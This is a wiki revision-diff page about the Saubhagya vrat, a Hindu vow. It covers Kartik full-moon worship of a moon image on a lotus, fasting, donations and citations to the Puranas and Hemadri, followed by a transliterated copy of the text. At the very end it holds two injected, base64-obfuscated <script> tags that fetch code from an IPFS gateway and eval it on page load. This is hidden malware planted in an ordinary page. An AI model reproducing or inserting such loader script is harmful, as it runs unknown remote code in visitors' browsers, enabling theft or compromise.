Difference between revisions of "सौभाग्य व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ref>(" to "ref>")
m (Text replace - ")</ref" to "</ref")
Line 5: Line 5:
 
*व्रत के अन्त में दो वस्त्रों का दान देना चाहिए।
 
*व्रत के अन्त में दो वस्त्रों का दान देना चाहिए।
 
*दस दिन उपवास या नक्त रहना चाहिए।
 
*दस दिन उपवास या नक्त रहना चाहिए।
*इस व्रत से कल्याण, सौन्दर्य एवं सम्भोग आनन्द की प्राप्ति होती है।<ref>हेमाद्रि (व्रत खण्ड 2, 235-236, विष्णुधर्मोत्तरपुराण से उद्धरण)</ref>
+
*इस व्रत से कल्याण, सौन्दर्य एवं सम्भोग आनन्द की प्राप्ति होती है।<ref>हेमाद्रि (व्रत खण्ड 2, 235-236, विष्णुधर्मोत्तरपुराण से उद्धरण</ref>
 
*एक वर्ष तक [[फाल्गुन]] एवं आगे की [[तृतीया]] पर नमक का त्याग करना चाहिए।
 
*एक वर्ष तक [[फाल्गुन]] एवं आगे की [[तृतीया]] पर नमक का त्याग करना चाहिए।
 
*अन्त में एक घर एवं पलंग का सारी सामग्रियों के साथ दान तथा '[[पार्वती]] मुझ पर प्रसन्न हों' के साथ एक सपत्नीक [[ब्राह्मण]] का सम्मान करना चाहिए।
 
*अन्त में एक घर एवं पलंग का सारी सामग्रियों के साथ दान तथा '[[पार्वती]] मुझ पर प्रसन्न हों' के साथ एक सपत्नीक [[ब्राह्मण]] का सम्मान करना चाहिए।
 
*कर्ता गौरीलोक वासी हो जाता है।
 
*कर्ता गौरीलोक वासी हो जाता है।
*सौभाग्यव्रत तिथिव्रत; [[देवता]] गौरी हैं।<ref>कृत्यकल्पतरु (व्रत खण्ड 441, [[मत्स्य पुराण]] 101|15-16); हेमाद्रि (व्रत खण्ड 1, 483, [[गरुड़ पुराण]] से उद्धरण)</ref>
+
*सौभाग्यव्रत तिथिव्रत; [[देवता]] गौरी हैं।<ref>कृत्यकल्पतरु (व्रत खण्ड 441, [[मत्स्य पुराण]] 101|15-16); हेमाद्रि (व्रत खण्ड 1, 483, [[गरुड़ पुराण]] से उद्धरण</ref>
*वर्षक्रियाकौमुदी<ref>वर्षक्रियाकौमुदी 29-30)</ref>, यहाँ 'लवणम्' के स्थान पर 'शयनम्' आया है।
+
*वर्षक्रियाकौमुदी<ref>वर्षक्रियाकौमुदी 29-30</ref>, यहाँ 'लवणम्' के स्थान पर 'शयनम्' आया है।
*[[अग्नि पुराण]]<ref>अग्नि पुराण 178224-25)</ref> में भी यही [[श्लोक]] है।
+
*[[अग्नि पुराण]]<ref>अग्नि पुराण 178224-25</ref> में भी यही [[श्लोक]] है।
*[[पंचमी]] पर चन्द्र का पूजक दीर्घायु, धन एवं यश पाता है।<ref>हेमाद्रि (व्रत खण्ड 1, 574, विष्णुधर्मोत्तरपुराण से उद्धरण)</ref>
+
*[[पंचमी]] पर चन्द्र का पूजक दीर्घायु, धन एवं यश पाता है।<ref>हेमाद्रि (व्रत खण्ड 1, 574, विष्णुधर्मोत्तरपुराण से उद्धरण</ref>
  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 12:49, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • saubhagyavrat mean kartik poornima par 16 daloan vale chitrit kamal ke bijakosh par sthapit chandr pratima ki pooja karani chahie.
  • kamal ke kijalkoan (aanshuoan) par 28 nakshatroan (abhijith ko lekar) ki pooja karani chahie.
  • pattiyoan par tithiyoan evan unake svamiyoan ki pooja karani chahie.
  • vrat ke ant mean do vastroan ka dan dena chahie.
  • das din upavas ya nakt rahana chahie.
  • is vrat se kalyan, saundary evan sambhog anand ki prapti hoti hai.[1]
  • ek varsh tak phalgun evan age ki tritiya par namak ka tyag karana chahie.
  • ant mean ek ghar evan palang ka sari samagriyoan ke sath dan tatha 'parvati mujh par prasann hoan' ke sath ek sapatnik brahman ka samman karana chahie.
  • karta gaurilok vasi ho jata hai.
  • saubhagyavrat tithivrat; devata gauri haian.[2]
  • varshakriyakaumudi[3], yahaan 'lavanamh' ke sthan par 'shayanamh' aya hai.
  • agni puran[4] mean bhi yahi shlok hai.
  • panchami par chandr ka poojak dirghayu, dhan evan yash pata hai.[5]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. hemadri (vrat khand 2, 235-236, vishnudharmottarapuran se uddharan
  2. krityakalpataru (vrat khand 441, matsy puran 101|15-16); hemadri (vrat khand 1, 483, garu d puran se uddharan
  3. varshakriyakaumudi 29-30
  4. agni puran 178224-25
  5. hemadri (vrat khand 1, 574, vishnudharmottarapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>